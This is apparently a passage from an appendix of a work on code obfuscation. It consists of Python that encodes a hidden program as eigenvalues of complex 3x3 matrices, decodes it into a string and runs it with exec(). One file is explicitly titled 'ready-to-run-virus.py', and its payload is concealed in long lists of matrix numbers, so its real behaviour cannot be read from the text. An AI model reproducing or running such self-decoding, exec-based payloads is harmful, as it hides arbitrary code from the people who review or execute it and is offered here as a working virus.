M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),]) M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),]) M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),]) M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),]) M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),]) M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),]) M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),]) M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),]) M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),]) M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),]) M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),]) M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),]) M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),]) M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),]) M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),]) M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),]) M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),]) M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),]) M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),]) M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),]) M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),]) M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),]) M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),]) M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),]) M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),]) M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),]) M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),]) M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),]) M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),]) M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),]) M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),]) M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),]) M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),]) M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),]) myMTXcode=getstring(M) exec(myMTXcode) - - - - - - - - - - - - - - - [SecretMsg.py] - - - - - - - - - - - - - - - - A.3) Ready-To-Run Virus Code - - - - - - - - - - - - - [ready-to-run-virus.py] - - - - - - - - - - - - - - def root3(num): fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j a=num**(1/3.0) b=a*fak1 c=a*fak2 return([a,b,c]) def getPQ(a,b,c): p = b-((a**2)/3.0) q = c + ((2*(a**3)-9*a*b)/27.0) return([p,q]) def getU(p,q): u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0) return(root3(u3)) def getLambda(a,p,u): if u[0] == 0: L0=u[0] - a/3.0 else: L0=u[0] - p/(3.0*u[0]) - a/3.0 if u[1] == 0: L1=-a/3.0 else: L1=u[1] - p/(3.0*u[1]) - a/3.0 if u[2] == 0: L2=-a/3.0 else: L2=u[2] - p/(3.0*u[2]) - a/3.0 return(L0,L1,L2) def getABC(mtx): a=-(mtx[0]+mtx[4]+mtx[8]) b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6] c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6] return([a,b,c]) def eigenvalues(mtx): ABC=getABC(mtx) PQ=getPQ(ABC[0],ABC[1],ABC[2]) U=getU(PQ[0],PQ[1]) L=getLambda(ABC[0],PQ[0],U) return(L) def getstring(M): str='' for c in range(len(M)): mLD=eigenvalues(M[c]) for i in range(len(mLD)+1): for n in range(len(mLD)): if round(mLD[n].imag)==i: str+=chr(int(round(mLD[n].real))) return(str) M=[] M.append([(112.392166973+3.11374438989j),(2.80972744346-2.47221619553j),(0.988986820381-6.98221015698j),(2.77429211612+4.904604525j),(112.599206781+2.71939002681j),(8.48418505863-5.03672753421j),(0.490366640773-5.00911970306j),(-0.703844933675-1.89832416836j),(101.008626246+0.166865583291j),]) M.append([(113.064296738+2.08174362808j),(-1.86927920181+1.46419176648j),(2.70787820915+0.136426190754j),(-1.7166287175-0.258958980354j),(112.44496356+3.7238586329j),(1.14333116739-1.62190100861j),(-1.77417109294+2.7314031356j),(-0.0297078714013+4.61440573185j),(115.490739702+0.194397739016j),]) M.append([(120.087150483-2.36613236792j),(-6.25513002998+8.95982204811j),(-15.4690684223-4.1039755493j),(46.4505703379-65.1804749943j),(90.4118588208+82.8954521867j),(-88.7601328495+16.2893139207j),(83.1135586447-8.50672626855j),(-87.3595948084+38.6286211086j),(32.5009906961-74.5293198188j),]) M.append([(113.364259855+8.20291390915j),(4.45094982031-1.50624331267j),(-3.90567628744+8.67564973424j),(-2.91061199722-5.50547587061j),(106.742416768+3.66804869041j),(2.76462074524-6.66742475107j),(-9.45941246409+1.73334950507j),(-0.375644021465+7.35712561951j),(100.893323377-5.87096259955j),]) M.append([(45.6609700047+14.2543780913j),(37.0346330668-46.6522804339j),(44.2021762477-46.1750115388j),(-79.6885581951+47.634076757j),(138.459235804-91.0217396431j),(43.336083693-100.144593664j),(68.0710656112-34.4448912885j),(-38.034109089+76.875678858j),(53.8797941915+82.7673615519j),]) M.append([(96.1714736317-54.2068376563j),(21.7201591034+37.1631877914j),(30.5555803431+35.7950078068j),(30.9579438214-37.7480853241j),(98.4098176139+33.7731433081j),(-11.8019803885+37.8566528055j),(68.6141421139-6.1724308915j),(-46.326945146+16.0489326633j),(66.4187087544+26.4336943481j),]) M.append([(23.8901669919+10.1482813609j),(57.337773642-16.7194003832j),(4.92774724933-25.3650545534j),(34.4814916491+35.0179077113j),(82.2024398414-19.2483236212j),(-11.7894851904+3.86290775897j),(26.0896534098-54.6349027842j),(-12.5701287861+41.7304652095j),(113.907393167+15.1000422603j),]) M.append([(107.952017497+1.4450086089j),(0.852253246711-0.672068189702j),(1.11513956471+2.89635755033j),(2.88806571899-0.579007193372j),(107.404974328+0.543713052685j),(-1.05942375212-0.835909099355j),(0.872318822594-2.52065161943j),(-2.32097177421-1.4816210096j),(110.643008175+4.01127833841j),]) M.append([(118.461345097+3.91141892498j),(2.25272597025+0.382510361925j),(1.4297784145+2.34875756062j),(-4.16291459741-5.3212039471j),(111.031047417+1.12775354067j),(2.09557727217-3.60519103112j),(-1.97024636945+4.84485342718j),(0.951374541966+2.86452809164j),(111.507607487+0.960827534357j),]) M.append([(357.628363267+92.8469333809j),(136.115149247+111.148835707j),(159.773513184+162.925118396j),(-138.806592757-442.683948291j),(121.730338465-309.654491847j),(55.5892168128-401.864727503j),(-240.073402866+393.255495158j),(-237.235721932+198.576836528j),(-221.358701732+222.807558466j),]) M.append([(9.27890942731+6.60162515529j),(-1.98242730666+1.10604974827j),(-4.32035703494-3.89378432967j),(43.9553898251-13.4459612477j),(32.2999037209+24.1423676957j),(-1.2097696525+52.1238431232j),(-41.0714097669-50.8959776767j),(17.718454418-41.9607308314j),(78.4211868518-24.743992851j),]) M.append([(68.9816561125+19.6648137307j),(30.0326746229-40.4496111733j),(-43.3375510737-63.6483966516j),(-27.3546304454-12.8072829971j),(142.713485315+2.78613581662j),(24.2740535503-58.1535405166j),(-11.0155999873+35.4600245451j),(-6.347761731-50.4699468475j),(23.3048585727-16.4509495473j),]) M.append([(110.988587516-3.19636245995j),(5.38915827204-2.22609770312j),(3.89703264623+5.36542422534j),(2.66518512129+13.1743664569j),(104.681972284+14.1333043075j),(-16.0410762524-4.04046832362j),(-0.157299834614+10.996265586j),(-5.19526136808+9.24492375957j),(97.3294402-4.93694184752j),]) M.append([(84.0197686727-3.40548877954j),(16.6130507636-7.56887224613j),(-0.0120001606247+19.6814859861j),(-10.7519878096-12.2438303612j),(117.391075666+3.95201422065j),(-5.23259386173+21.074968823j),(-6.27068280837+4.47452412714j),(2.12999583936-7.58886344923j),(110.589155662+5.45347455889j),]) M.append([(108.455628206-9.9066765828j),(-11.45617845-12.2931842073j),(-4.33795052255+24.8361335138j),(-7.1937391782+1.64808526333j),(102.692857986+8.54076867583j),(16.0166769504+1.87432971969j),(-0.333995848201-3.08109290136j),(-3.53870539959-2.29686913962j),(109.851513808+7.36590790697j),]) M.append([(115.437066584+20.3242986715j),(4.98681042396-101.613919479j),(12.7643563713+50.4362402978j),(3.93830775129-3.14557676051j),(77.4610737092+5.96770379432j),(13.4900051304-7.6053857712j),(-16.4133790643-6.98651721892j),(71.7449011837+67.2448516456j),(65.1018597071-20.2920024658j),]) M.append([(118.676728124+15.2247864631j),(50.8838826338+5.36782245249j),(11.4836501902+56.5624320043j),(-0.0281342761762-16.5882799997j),(54.1734726271-12.3007268119j),(-9.76074738473-72.072876412j),(-4.46727266455-1.37083544783j),(-3.46339241281+12.1692388486j),(104.149799249+3.07594034877j),]) M.append([(30.9884689862-15.7048430711j),(4.69492396776+34.028393728j),(-1.83367330754+5.87531518241j),(-7.11362671815-12.4176344872j),(53.1439079003+19.4679960037j),(-6.4214115792+2.59721449983j),(19.3933113893-17.3974720522j),(-24.2836923457+29.8747069176j),(15.8676231135+2.23684706744j),]) M.append([(135.748625379-198.369669609j),(301.110286034+184.749191401j),(16.6581335977+393.463644688j),(119.938890562+107.657643259j),(-146.855732705+121.979477072j),(-265.790482195-158.675312199j),(-71.1094004364-60.0230512016j),(138.250242777-77.6942082219j),(256.107107325+82.3901925366j),]) M.append([(71.0410332859+11.9245003848j),(-39.0605189141-7.13100629938j),(17.424393995+7.9558864525j),(-49.7214801734-14.5618016888j),(74.388154586-23.2451732297j),(16.0148265722+22.147477958j),(-22.3851379416-23.3834997744j),(-14.7199219871-33.5272937202j),(110.570812128+17.320672845j),]) M.append([(57.3227264739+57.62254077j),(-50.6925025909+11.9075400749j),(11.8991783239+34.6169850218j),(-39.0291224825+0.900464997735j),(82.0939605559-14.146760552j),(-7.31389969745+15.9240718286j),(73.9151559787-41.4492814791j),(60.177740319+7.01997585428j),(107.58331297-37.475780218j),]) M.append([(79.0473177415+5.59079487409j),(-13.1820218666-17.1613485431j),(6.81135825021+32.0757991584j),(-0.583720814442-11.0529623419j),(105.196942683-14.3520719373j),(1.85770929225+17.0853571572j),(7.29596265724-35.8898736179j),(38.4197283414-26.9959650541j),(58.755739576+14.7612770632j),]) M.append([(105.687951776+3.58301150862j),(2.02949766126+0.103349612216j),(-2.84682409639-3.96097182811j),(-2.34166143577-1.26714366846j),(101.295806677+3.04282217634j),(2.88528649512+2.00796486995j),(-2.12874814427+4.08503026524j),(0.824199869685+1.18679931198j),(107.016241547-0.625833684954j),]) M.append([(52.2917826765+10.3032998946j),(6.12828354863-8.19537935109j),(-1.06694306676+8.08392023205j),(13.5521395972-0.531830096695j),(40.6219449518-5.46975902275j),(5.67379871534+7.51445057939j),(3.65252824863-4.24815978353j),(-0.439531241512-1.51737638292j),(45.0862723717+1.16645912811j),]) M.append([(-3.3851863214-21.987629697j),(-205.850630359+89.6989168601j),(208.024603596+52.2066183549j),(-5.6907611824-12.0154949654j),(-38.9314103288-20.2566882544j),(42.5452576771+53.7306864104j),(-18.2076384696-20.315914865j),(-109.125158731+35.7778100981j),(142.31659665+48.2443179514j),]) M.append([(32.0390456432+2.25024550577j),(0.029707665891+0.0682006231274j),(-0.644322624335-0.729090794125j),(-0.0607399721385-0.211717800188j),(32.0353365744+2.18016687334j),(0.114873438286+0.541499410704j),(0.00733992629831-0.543833623253j),(-0.854652946072+0.69660031689j),(31.9256177824+1.56958762089j),]) M.append([(112.010903875+5.81709415546j),(-7.4125777792+0.82876368121j),(2.8203660059+9.38486474579j),(-0.79917492508-3.91032693219j),(116.938214229+2.94061706319j),(0.485022463492-7.81665249231j),(5.51192189953-3.17179136433j),(5.70362594998-1.93126268865j),(116.050881897-2.75771121865j),]) M.append([(69.1116352679-7.83905648323j),(-24.5730317227+15.1801442873j),(-47.9142513376-12.12357321j),(-20.2426631325-23.4473788917j),(79.5543186408+0.470812018939j),(-32.2193782922-21.9967582124j),(-0.496771501163+12.2079787778j),(2.21996185606-0.548558192395j),(106.334046091+13.3682444643j),]) M.append([(104.021588338+5.52820876771j),(4.55273693964+0.512929957915j),(1.55361985287-8.02262245458j),(0.496799420731+1.66206189638j),(111.667511098-0.973329112828j),(-2.03218243806-2.76264692637j),(-1.622224234+3.29290344841j),(0.0859901123567+1.55280799949j),(107.310900563+1.44512034512j),]) M.append([(108.809878483+5.96767402313j),(2.41181931996-4.99572317975j),(4.38940019138+0.0161717533525j),(46.3296019864+5.62144250361j),(81.5789436566+7.58093012766j),(30.7589945147-62.6512650446j),(-8.69377093865-22.3176589144j),(5.62506032389+13.0953657147j),(63.6111778601-7.54860415079j),]) M.append([(92.0110112305+0.290257868199j),(-4.36430450807+6.53808216406j),(-21.0746314583-4.73870303228j),(-25.0479962662-24.6808868074j),(75.9198623035+9.12274455008j),(-66.5378650906-31.9932884126j),(-9.74718919728-3.02322470536j),(-8.32356042526+4.37155275057j),(88.069126466-3.41300241827j),]) M.append([(99.6002306511+16.3443823393j),(14.9337225169+15.6463398972j),(-11.7128060014-15.2768982952j),(14.6791832362+28.5008698465j),(144.894476842-9.17687593996j),(-30.0402252665+5.17416028354j),(0.626195858811+22.1278822669j),(26.6874029933+2.28697265j),(87.5052925073-1.16750639932j),]) M.append([(108.612887072+0.91011855877j),(-0.782248141865+3.42964511489j),(-2.72276450868+4.59306415732j),(1.12047347392-1.06782400378j),(112.527826769+1.7692034989j),(1.47053553232-0.370131490455j),(-1.24280748547-5.27965631629j),(-1.89342237354+1.69615968733j),(105.859286159+3.32067794233j),]) M.append([(105.024635147+29.9653547547j),(4.99431641879+46.2352303307j),(-26.2159937015-44.4997423626j),(38.778360865-69.1105390714j),(92.3369053437+1.4117106156j),(-53.8474349087+22.8990644205j),(72.0952965439-7.75879485538j),(28.1420321061+39.4844178535j),(-3.36154049027-25.3770653703j),]) M.append([(49.9429192508-1.9791664476j),(2.11554051601-2.94480819556j),(2.01224919704+3.38456501636j),(7.09493892637+1.25216717606j),(49.3717576027+5.07354612499j),(-4.04049404824+3.05598969584j),(4.64495242804+2.46857721171j),(-1.85238875422+0.0426120972825j),(45.6853231465+2.9056203226j),]) M.append([(40.92363048+4.28586182862j),(-5.64617503474+1.78844069688j),(-2.08099151054+3.47891730774j),(10.4251531901-0.683602665146j),(56.548972484+0.511738767144j),(0.728866996186-0.475350015246j),(-6.05910179762-6.79299876935j),(-5.04252698307-5.25414840644j),(44.5273970361+1.20239940424j),]) M.append([(81.072854054+3.25817066153j),(31.3554081408-3.18753098863j),(-11.1399433789+32.5705056205j),(39.2396300323+17.4385358285j),(73.7746651562-11.8478140909j),(32.0758836805-29.3801719099j),(-10.3145319589+4.37357789713j),(8.74250630687-6.40771071807j),(112.15248079+14.5896434294j),]) M.append([(56.909090209-47.7837423205j),(65.2744239077-37.5171450418j),(-18.8450241411+77.3976229225j),(59.3519781483-16.5179979977j),(107.200224699+60.9534041762j),(-40.9185346825-38.3336307464j),(13.7171447351-4.78915798757j),(1.1071636738+8.97983189728j),(98.8906850921-7.16966185578j),]) M.append([(102.190324053+6.15320876862j),(-1.89238320608+4.8979642732j),(1.72891706184-3.63428826218j),(4.30995354314-3.64378048035j),(109.3179783-0.901891649351j),(-4.99180681029+3.5945902833j),(-1.61197015931-0.719139509474j),(-3.07622900668+0.951144700176j),(105.491697647+0.748682880731j),]) M.append([(108.889151945+1.11852322308j),(3.44940673295-1.28652203507j),(0.38386503484-1.21530607993j),(-0.214608866573-1.1334784316j),(111.716465445+2.15146026689j),(0.0678618534776-0.502243776855j),(3.8030328065+0.889817848038j),(-4.17084465217+1.50465733851j),(113.39438261+2.73001651002j),]) M.append([(42.5371102294+1.44512768918j),(-9.04492220291-10.3550106694j),(4.38722949066+5.49882044164j),(2.12582811561+1.5801313798j),(49.1880357642-2.69754403205j),(-4.45754098596+5.84176159977j),(2.13682554996-4.82236542308j),(5.72267073934-8.27637771593j),(46.2748540064+7.25241634286j),]) M.append([(45.0681176101+4.83564322361j),(-0.486640961444+5.21730609114j),(-2.55194012253-3.98045044051j),(-1.01468491215-2.91556879926j),(49.1510834107+0.67497370759j),(3.0609877073+2.26092012335j),(-3.40552492335-1.1957362917j),(0.366768306834+1.78981194406j),(50.7807989792+0.489383068805j),]) M.append([(42.0400594784+3.96804445961j),(2.81292626432-1.3100328267j),(1.057449393-2.21526618381j),(1.46738323933+0.361187921677j),(43.0966477046-0.06561667082j),(0.187025019495-1.46274899586j),(-1.42983863437+2.45259304705j),(6.51321802751+2.57734003722j),(45.8632928169+2.09757221121j),]) M.append([(64.5872575934+2.33530392307j),(3.35442276957+23.2114061177j),(26.2474348027+10.4086844591j),(-7.54584074767-19.2420940104j),(60.959999244-8.22476079316j),(-1.63976594936-19.5955808214j),(20.4036268983-1.04498100856j),(0.898453958306+18.7464188482j),(70.4527431626+11.8894568701j),]) M.append([(29.2148157357-39.4589265979j),(23.7021959901-3.56023332984j),(-16.4862023896+35.7839509265j),(-11.8414452413+5.88707850669j),(4.23920519143-1.69034775559j),(9.68292277249-5.77261559178j),(-87.9924709683-54.1035972708j),(-1.22000413605-53.972475686j),(86.5459790729+47.1492743535j),]) M.append([(88.9499181519-14.1483991562j),(49.5238482155-3.06980715273j),(0.75676529069+52.049792283j),(9.43955866705+8.13276532154j),(72.6460434883+10.4441264965j),(-9.01810269553-29.282928181j),(6.85326866889-10.1918610121j),(10.0172911337+26.7250539563j),(73.4040383599+9.70427265971j),]) M.append([(109.846643176+1.25732881974j),(0.455185624174+2.24504332179j),(0.863411782635+1.70836997481j),(-4.13738392023-1.15391532902j),(111.940942072+1.19359593982j),(1.93178028812-1.74149364927j),(4.08578590945-7.92525821757j),(-0.101941271438+3.37675153096j),(112.212414753+3.54907524044j),]) M.append([(106.010016728+6.36804468458j),(1.02887407576-5.90629411075j),(-6.00075529107-10.6677750642j),(4.85692463147+0.223941775999j),(108.300733908+5.10077612646j),(-0.575341129514+8.42952849633j),(-4.33976533333-3.76655324226j),(4.81839802684-4.41008749257j),(118.689249364-5.46882081103j),]) M.append([(-305.423797651-305.245989176j),(69.8105739041-565.223062049j),(208.375402714-61.8978175941j),(250.465859517+21.3481404565j),(233.037107075+254.383427048j),(-68.6677797903+76.2138071255j),(-222.040843158-525.590602377j),(390.150317711-504.864638451j),(341.386690576+56.862562128j),]) M.append([(38.9871093057+26.0557712389j),(8.37260656076+14.275904526j),(-12.9483002196+1.23971229425j),(34.8380628872-10.3847932946j),(59.8984039575-17.3219748428j),(-0.370980033134+1.31010873336j),(-36.1362178484-7.85754889j),(-24.9283951066+10.8472618652j),(54.1144867368-2.73379639611j),]) M.append([(41.8241815583+2.2189753102j),(-14.043554527+14.569201027j),(-10.17487071-1.79897209146j),(-7.45585973759-10.5886064369j),(51.484531262+7.50468708356j),(12.399133106+2.43370609855j),(-2.73683130272-0.356276046589j),(-1.56730358456-7.8558566688j),(47.6912871797-3.72366239376j),]) M.append([(71.5691677072+23.2039218774j),(9.64237738632-7.34762536439j),(22.7182456091-0.484841022469j),(25.9263307573-6.53517400147j),(53.3453589774-10.9524001347j),(6.9099628537-23.8301081648j),(-2.35574344471-26.7406000784j),(-12.4419347073+8.61738893353j),(40.0854733154-6.25152174267j),]) M.append([(21.1367075543+8.94033073319j),(-11.9545663843+7.78782612916j),(14.6053096548+19.9368874645j),(15.4116808618-6.89858420125j),(50.2900306036-5.59315201444j),(-16.2694303876-30.8595556734j),(1.09893878893-14.6934392226j),(1.03708644102-17.0680831029j),(2.57326184207+2.65282128125j),]) M.append([(63.6931250174+12.8200757581j),(12.2587275064-3.14458254213j),(8.74273479052+18.1231177876j),(0.833922916619-1.44554145381j),(46.1078075016-0.904116860831j),(-0.299122661536-3.4535399568j),(-6.92111356571-9.07089477761j),(-6.7185116826+2.53850777167j),(47.199067481-5.91595889726j),]) M.append([(42.4847806891-7.33293774578j),(3.83159364366+6.41263583459j),(-14.9310639231+8.71976317072j),(0.539787505087-2.47028217271j),(52.5533477937+7.09115186173j),(-7.18820188484+5.64801625861j),(-6.99830111821+9.68540229206j),(-0.067946401887-7.35987526697j),(62.9618715172+6.24178588405j),]) M.append([(46.1978416877+8.47917917895j),(-13.142176542+6.04084802123j),(10.8323670156+0.495720925585j),(7.17319512385-2.79087195607j),(65.5538737797+4.52420183556j),(-9.79787095959-9.37731915281j),(7.53312411646+3.51625277849j),(6.1061480071+12.75539123j),(47.2482845326-7.00338101451j),]) M.append([(54.7263084586-3.80952887441j),(-8.43904427646-4.0011557936j),(-10.6021251038-6.36713380573j),(-1.85267915574+6.4356737033j),(55.2930763588-0.800000485693j),(6.00728494051-2.80315182256j),(-8.49920446949+2.25136777174j),(-0.126659987703+6.28268464917j),(49.9806151826+10.6095293601j),]) M.append([(45.9551195582+5.00638831759j),(1.04026306004+6.08051020693j),(3.26625626404-4.91024879943j),(-7.02820616351+3.84387144354j),(64.0832970807+3.25342123525j),(-1.19493329401-5.3570488703j),(3.11057879708+6.81534188848j),(-2.65986526449+4.09661698469j),(50.961583361-2.25980955284j),]) M.append([(56.0475066574-3.67165896308j),(-1.85027659067+4.71768098517j),(5.64349619203+2.18099364248j),(-0.509962215447-0.0900222402824j),(54.2138607125+3.49772964385j),(-2.89229482535+2.92270061104j),(15.1418694843+2.05771940623j),(-15.7417706954-1.15546472412j),(51.7386326302+6.17392931923j),]) 